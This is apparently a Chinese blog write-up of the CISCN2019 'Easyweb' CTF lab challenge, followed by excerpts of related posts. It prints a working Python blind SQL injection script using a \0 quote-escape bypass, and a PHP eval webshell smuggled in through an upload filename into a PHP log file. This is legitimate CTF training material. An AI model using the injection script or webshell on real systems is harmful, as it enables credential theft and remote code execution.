[CISCN2019 总决赛 Day2 Web1]Easyweb

最新推荐文章于 2023-10-09 10:03:48 发布
原创 最新推荐文章于 2023-10-09 10:03:48 发布 · 218 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web #python #网络安全 #web安全

本文探讨了CISCN2019总决赛中的Web1 Easyweb挑战,涉及SQL注入手法,通过payload和源码审计揭示了如何利用字符绕过单引号过滤,实现文件名注入并获取shell。还提到了蚂蚁剑工具在获取flag过程中的作用。

[CISCN2019 总决赛 Day2 Web1]Easyweb

在这里插入图片描述扫描一下,发现有robots.txt在这里插入图片描述试着访问备份文件,但是是哪一个呢,这里在源码中发现这几个页面在这里插入图片描述一个一个的试在这里插入图片描述这里审计一下源码,对单引号进行了过滤,无法闭合单引号,所以我们用\0来转义掉它的单引号。输入\0,经过“addslashes”函数会先变成\0,然后经过“str_replace”函数,会变成,这样,就把id后面的单引号给转义了sql注入代码

import  requests

url = "http://59a1680b-ce34-463d-a669-50bf20d7d79c.node4.buuoj.cn:81//image.php?id=\\0&path="
payload = "or id=if(ascii(substr((select username from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
    l = 1
    r = 130
    mid = (l + r)>>1
    while(l<r):
        payloads = payload.format(i,mid)
        print(url+payloads)
        html = requests.get(url+payloads)
        if "JFIF" in html.text:
            l = mid +1
        else:
            r = mid
        mid = (l + r)>>1
    result+=chr(mid)
    print(result)

破解得到的密码登录在这里插入图片描述
先随便上传一下在这里插入图片描述说的是把文件名和用户名写入日志文件。但是这里日志文件为php格式,考虑写入shell。由于用户名只能为admin无法利用,考虑文件名注入。文件名进行了php/i过滤,可以使用短标签绕过:filename="<?=@eval($_POST['a']);?>"
抓包绕过
在这里插入图片描述蚁剑链接在这里插入图片描述得到flag

[CISCN2019 总决赛 Day2 Web1]Easyweb1
Mrs_H的博客
10-22 727
一.前言 在之前的文章中我提到最近一直在做sql注入相关的东西,也在一直做sql注入有关的题目。但是,事实上很多赛题他们的考点并不单一,往往需要结合着其他的知识,才能够拿到想要的结果。下面这道题就是我刚才所说的典型,虽然考的不难,但是足够说明当前sql题目的走向了。 二.正文 我们首先打开环境看到如下页面。 emmm,一个花里胡哨的登陆界面。尝试输入了很多用户名和密码组合,但是都不对。那就去扫一下目录,发现该网站存在一个robots.txt 这个robots文件中的内容就是在提示我们,该网站含有备份文件
[CISCN2019 总决赛 Day2 Web1]Easyweb 1
m0_62879498的博客
05-21 2086
[CISCN2019 总决赛 Day2 Web1]Easyweb 1 0x00 前言 就这道题而言,并没有单一的考察某一个知识点,而是将我们前面的 sql和upload等一些知识结合起来。 0x01 备份文件下载 首先我们的打开环境 让我们进行登录 一开始我以为是弱密码爆破 直接使用bp,爆出来个寂寞 之后查看源码,抓包查看无果后 尝试进行目录扫描,发现网站中存在 robots.txt 查看robots.txt ,发现该网站中存在含有备份文件 下载备份文件 <?php include "c
BUUCTF [CISCN2019 总决赛 Day2 Web1] Easyweb
Senimo
12-09 2532
BUUCTF [CISCN2019 总决赛 Day2 Web1] Easyweb 考点: 启动靶机: 一个登陆页面,查看源码: <div class="clear"> </div> <div class="avtar"><img src="image.php?id=2" width="200" height="200"/></div> <form method="post" action="user.php"> 发现其存在ima
[CISCN2019 总决赛 Day2 Web1]Easyweb 盲注 \\0绕过 文件上传文件名木马
m0_64180167的博客
10-09 645
爆列名的时候 因为 'users' 会给过滤 所以我们要通过16进制来实现。所以最后我们 然后 后面的path 就变为了可控了。最后发现 只有 image.php.bak存在。这里是文件名 那我们从文件名注入吧。但是这里我们不可以使用 \\。扫除 robots.txt。那我们sql语句就会变为了。成功了 我们直接上传木马吧。这里主要的地方是 \\0。过滤了 换短标签看看。因为第一个\会被转义。所以我们需要 \\0。
CISCN2019 总决赛 Day2 Web1】-Easy web
xixihahawuwu的博客
11-28 901
进入环境是一个登录界面检查页面元素没有发现啥,我们把源码下载下来看看先看config文件 是一个数据库文件 数据库名为ciscnfinal 接着看function文件 我们可以看到有关登录界面的还有两个函数方法 看image文件Get传递两个参数 把一些字符替换成空Addslashes()函数会把一些特殊的字符转义,比如单引号转为\’,\转为\其他的看了下,没有什么信息就过掉了 我们看下upload文件要求我们用户名必须为admin 这里我们可以获得用户名admin在user文件中我们可以知道成功登陆后的.
[ciscn2019 总决赛 day2 web1]easyweb
03-16
ciscn2019 总决赛 day2 web1 easyweb 是一道Web安全题目,需要使用SQL注入技术来解决。 首先,我们需要在登录页面中输入用户名和密码。然后,我们可以通过在用户名和密码字段中输入一些SQL注入语句来尝试绕过验证...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值